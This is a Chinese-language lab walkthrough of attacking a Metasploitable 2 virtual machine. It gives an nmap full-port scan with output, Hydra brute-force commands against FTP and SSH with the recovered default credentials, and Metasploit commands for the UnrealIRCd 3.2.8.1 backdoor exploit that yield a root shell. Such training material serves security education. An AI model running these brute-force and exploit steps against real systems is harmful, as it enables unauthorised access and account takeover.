作为攻击者的操作系统(linux,大多数时候使用BackTrack),我们需要在kali虚拟机中通过使用nmap来辨认开放的端口。接下来的命令能够扫描目标系统-Metasploitable 2的所有TCP端口。
root@kali:~# nmap -p0-65535 192.168.104.3
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-02 09:25 EST
Nmap scan report for 192.168.104.3
Host is up (0.000064s latency).
Not shown: 65506 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslock
2049/tcp open nfs
2121/tcp open ccproxy-ftp
3306/tcp open mysql
3632/tcp open distccd
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
6667/tcp open irc
6697/tcp open ircs-u
8009/tcp open ajp13
8180/tcp open unknown
8787/tcp open msgsrvr
40975/tcp open unknown
46319/tcp open unknown
47123/tcp open unknown
57854/tcp open unknown
MAC Address: 08:00:27:F3:B5:57 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 8.40 seconds
目标系统中几乎每一个端口监听的服务都给我们提供一个远程接入点。
root@kali:~/ddos# hydra -L user.txt -P pwd.txt ftp://192.168.104.3
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2019-01-04 09:34:49
[DATA] max 16 tasks per 1 server, overall 16 tasks, 117 login tries (l:9/p:13), ~8 tries per task
[DATA] attacking ftp://192.168.104.3:21/
[21][ftp] host: 192.168.104.3 login: user password: user
[21][ftp] host: 192.168.104.3 login: msfadmin password: msfadmin
[21][ftp] host: 192.168.104.3 login: postgres password: postgres
[21][ftp] host: 192.168.104.3 login: service password: service
1 of 1 target successfully completed, 4 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2019-01-04 09:35:17
接下来即可用爆破出来的账号和密码登录metasploitable,我们可以用同样的方法爆破ssh端口:
hydra -L user.txt -P pwd.txt 192.168.104.3 ssh
用爆破得到的用户名和密码远程连接:
Ⅴ.端口渗透
进行端口渗透所利用的端口为6667端口,漏洞为irc_3281_backdoor。
进入kali虚拟机,开启终端,输入如下命令:
msfconsole
use exploit/unix/irc/unreal_ircd_3281_backdoor
show options
set RHOST 192.168.104.3
exploit
成功获取会话,root权限。